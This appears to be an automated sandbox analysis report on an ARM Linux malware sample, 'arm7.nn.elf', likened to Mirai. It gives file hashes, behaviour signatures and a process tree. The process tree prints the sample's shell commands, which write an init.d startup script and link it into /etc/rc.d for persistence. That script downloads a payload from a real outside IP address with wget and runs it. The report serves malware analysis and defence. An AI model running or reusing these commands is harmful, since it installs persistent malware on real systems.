Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    05/09/2024, 17:36

General

  • Target

    arm7.nn.elf

  • Size

    157KB

  • MD5

    9fe44e38f31dfc22fc37f8f4b0ad665b

  • SHA1

    003f2be0ac848c14527ec7b555e6517b8099c152

  • SHA256

    463cd5a52848c54f9c7736f71dc0fa2e2e117e14798cbfd7d7ca4f0ab32e9a8d

  • SHA512

    231d8d66523de1e9b3f41630e869a721f66a916ecf5fecd763108407d89fd885bc12a68b7efdf668cfd9d2989c6c9a1de5bd07fb313427a2fe2760aeb8720baa

  • SSDEEP

    3072:hkDdGanTaRJKm7GiSAubGkU58hsugq3VXM/9//mAwYhDNc:hkDhnTaRJKm7GiGbGmKugq35M/9XmAwZ

Malware Config

Signatures

  • Creates a large amount of network flows (1 TTP)

    This may indicate a network scan to discover remotely running services.

  • Modifies Watchdog functionality (1 TTP, 2 IoCs)

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Modifies init.d (2 TTPs, 1 IoC)

    Adds/modifies system service, likely for persistence.

  • Modifies rc script (2 TTPs, 1 IoC)

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Changes its process name (1 IoC)
  • Command and Scripting Interpreter: Unix Shell (1 TTP, 4 IoCs)

    Execute scripts via Unix Shell.

  • Reads runtime system information (1 IoC)

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/arm7.nn.elf
    /tmp/arm7.nn.elf
    1⤵
    • Modifies Watchdog functionality
    • Modifies rc script
    • Changes its process name
    PID:655
    • /bin/sh
      /bin/sh -c "echo \"#!/bin/sh # /etc/init.d/arm7.nn.elf case \\\"\$1\\\" in start) echo 'Starting arm7.nn.elf' /tmp/arm7.nn.elf & wget http://45.202.35.35/lol -O /tmp/lol chmod +x /tmp/lol /tmp/lol & ;; stop) echo 'Stopping arm7.nn.elf' killall arm7.nn.elf ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/arm7.nn.elf"
      2⤵
      • Modifies init.d
      • Command and Scripting Interpreter: Unix Shell
      PID:657
    • /bin/sh
      /bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf"
      2⤵
      • Command and Scripting Interpreter: Unix Shell
      PID:659
      • /bin/chmod
        chmod +x /etc/init.d/arm7.nn.elf
        3⤵
        PID:662
    • /bin/sh
      /bin/sh -c "mkdir -p /etc/rc.d"
      2⤵
      • Command and Scripting Interpreter: Unix Shell
      PID:667
      • /bin/mkdir
        mkdir -p /etc/rc.d
        3⤵
        • Reads runtime system information
        PID:669
    • /bin/sh
      /bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf"
      2⤵
      • Command and Scripting Interpreter: Unix Shell
      PID:671
      • /bin/ln
        ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf
        3⤵
        PID:673

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /etc/init.d/arm7.nn.elf

    Filesize

    407B

    MD5

    cca1fc56c22484f5782c4052405cd45c

    SHA1

    7991a1d47122cc9807ac8c80d2a8749db43da8b5

    SHA256

    16b6e8365451e48a63324d63e58a066662f3f4380f2b5efba7f6b4fe054e8c3a

    SHA512

    8f44534e1711ef9619e6e323c9117a7bbe9b38a7533ab69f6f8de414283b936283c2a4c2092e3ad3e107d5c1ae3ef56c743aa80e155f42da7d9376f5196eff1d